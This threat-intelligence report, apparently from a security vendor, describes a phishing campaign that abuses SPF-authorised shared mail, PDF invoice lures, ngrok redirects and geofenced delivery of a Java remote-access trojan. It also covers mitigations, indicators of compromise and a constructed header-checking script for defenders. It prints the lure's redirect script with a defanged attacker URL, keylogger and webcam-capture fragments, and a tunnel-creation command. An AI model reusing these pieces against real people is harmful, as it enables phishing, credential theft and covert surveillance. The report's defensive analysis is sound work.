A recent campaign targeting Southern European organizations demonstrates advanced evasion techniques combining social engineering, trusted platforms, and geolocation filtering. The attack chain unfolds through four precision stages:
1. Legitimacy Engineering via SPF Bypass
Attackers abused Spain’s serviciodecorreo.es email service, which the SPF records of multiple target domains authorized as a legitimate sender. This let malicious emails pass SPF/DKIM checks while displaying forged sender addresses such as:
```
From: Accounting <invoice@[target-company-domain]>
```
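A defender-side check for this stage, added here as an example and not taken from the original report: it parses a message's From and Authentication-Results headers and flags inbound mail that claims one of our own domains while arriving from a host outside our own MTAs or carrying a DKIM signature from an unaligned domain. The organisation domains, MTA and relay IPs, and both sample messages are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed for this example: our own domains and the IPs of our own outbound MTAs.
ORG_DOMAINS = {"example-target.com"}
ORG_MTA_IPS = {"198.51.100.5"}

# Parsers for the spf= and dkim= clauses of an Authentication-Results header
# written in the "(sender IP is x.x.x.x)" style many gateways emit.
SPF_RE = re.compile(r"spf=(\w+)\s*\(sender IP is ([\d.]+)\)\s*smtp\.mailfrom=\S+?@([\w.-]+)", re.I)
DKIM_RE = re.compile(r"dkim=(\w+)[^;]*header\.d=([\w.-]+)", re.I)

def aligned(domain, from_domain):
    """Relaxed DMARC alignment: same domain or a subdomain of the From domain."""
    return domain == from_domain or domain.endswith("." + from_domain)

def assess(raw_message):
    """Return a list of findings for one message; an empty list means nothing odd."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    findings = []
    if from_domain not in ORG_DOMAINS:
        return findings  # only mail impersonating our own domains is in scope
    auth = " ".join(msg.get_all("Authentication-Results", []))
    spf, dkim = SPF_RE.search(auth), DKIM_RE.search(auth)
    sender_ip = spf.group(2) if spf else None
    if sender_ip not in ORG_MTA_IPS:
        findings.append(f"From claims {from_domain} but sender IP {sender_ip} is not one of our MTAs")
    # SPF may legitimately pass when our SPF record authorises a shared provider, which is
    # the gap this campaign used, so alignment of the authenticated identities is checked too.
    if spf and spf.group(1).lower() == "pass" and not aligned(spf.group(3).lower(), from_domain):
        findings.append(f"SPF passed for unaligned domain {spf.group(3)}")
    if dkim and dkim.group(1).lower() == "pass" and not aligned(dkim.group(2).lower(), from_domain):
        findings.append(f"DKIM signed by {dkim.group(2)}, not aligned with the From domain")
    return findings

# Constructed samples: a spoofed invoice relayed through a shared provider (the
# provider's IP is made up) and a genuine message sent through our own MTA.
SPOOFED = """\
From: Accounting <invoice@example-target.com>
Authentication-Results: mx.example-target.com; spf=pass (sender IP is 203.0.113.10) smtp.mailfrom=invoice@example-target.com; dkim=pass header.d=serviciodecorreo.es
"""
GENUINE = """\
From: AP Team <ap@example-target.com>
Authentication-Results: mx.example-target.com; spf=pass (sender IP is 198.51.100.5) smtp.mailfrom=ap@example-target.com; dkim=pass header.d=example-target.com
"""
```

Running `assess(SPOOFED)` yields two findings (external sender IP and unaligned DKIM signer) while `assess(GENUINE)` yields none; the header format your gateway writes may differ, so adjust the regular expressions to match it.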

2. Weaponized PDF Lure
The attached PDF mimicked a Medinova Health Group invoice and contained a clickable Dropbox link to an HTML file (Fattura.html). The file implemented a multi-stage verification process:
```html
<!-- Stage 1: Fake CAPTCHA -->
<div class="g-recaptcha" data-sitekey="6Lc8Xp4UAAAAA..."
     data-callback="onCaptchaSuccess"></div>
<!-- Stage 2: Ngrok redirection -->
<script>
function redirectToDoc() {
  window.location.href = "hxxps://3c7f-185-107-57-126.ngrok-free.app/view";
}
</script>
```
3. Geolocation-Aware Payload Delivery
Ngrok’s tunneling service enabled dynamic content switching based on victim location:

| Geolocation | Content Delivered | Platform Used |
|---|---|---|
| Italy | FA-43-03-2025.jar (RATty) | MediaFire |
| Non-Italy | Benign Google Drive PDF | GDrive |
This geo-fencing bypassed automated sandboxes typically hosted in cloud regions outside Italy.
4. Cross-Platform RAT Execution
The final JAR file (SHA256: a1c2861a68b2a4d62b6fbfc7534f498cefe5f92f720466d24ae1b66ebc9f5731) leverages Java’s cross-platform capabilities with these post-exploitation features (illustrative fragments, not a complete class):
```java
import java.awt.event.KeyEvent;
import java.awt.event.KeyListener;
// Webcam class assumed to come from a third-party webcam-capture library; the report does not name it
import com.github.sarxos.webcam.Webcam;

// Keylogging implementation: records each character typed into the listening component
public class KeyLogger implements KeyListener {
    public void keyTyped(KeyEvent e) {
        logToFile(String.valueOf(e.getKeyChar()));
    }
    // KeyListener also requires these two methods; the fragment leaves them unused
    public void keyPressed(KeyEvent e) {}
    public void keyReleased(KeyEvent e) {}
}

// Webcam activation (statement shown outside any class in the original fragment)
Webcam webcam = Webcam.getDefault();
webcam.open();
```
Evasion Taxonomy
The campaign employed a layered obfuscation matrix:
- Infrastructure camouflage
  - Ngrok tunnels masking C2 infrastructure
  - Legitimate CDNs (MediaFire, Dropbox) for payload hosting
- Contextual deception
  - Neutral filenames (FA-43-03-2025.jar)
  - Invoice-themed lures matching sector-specific expectations
- Protocol abuse
```bash
# Ngrok tunnel creation command
ngrok http 80 --region=eu --subdomain=targetco-invoice
```
Mitigation strategies
Fortinet’s defense-in-depth approach neutralizes this threat through:
FortiMail protections
- Content Disarm & Reconstruction (CDR) for Office/PDF files
- Real-time URL rescanning with FortiSandbox integration
Network-Level defenses
```
# Sample FortiGate AV signature update
config antivirus settings
    set default-db extended
    set grayware enable
end
```
User resilience
- Phishing simulations targeting:
  - Urgency exploitation patterns
  - Document verification workflows
  - Geolocation-based content expectations
This campaign underscores the critical need for behavior-aware email security that analyzes both content and context beyond traditional signature-based detection. The combination of geo-aware filtering and trusted platform abuse suggests a new normal in advanced email threats that demands equally sophisticated defense postures.
Indicators of Compromise

| Type | Value |
|---|---|
| SHA256 | a1c2861a68b2a4d62b6fbfc7534f498c… |
| C2 IP | 143.47.53.106 |
| Ngrok Domain | 3c7f-185-107-57-126.ngrok-free.app |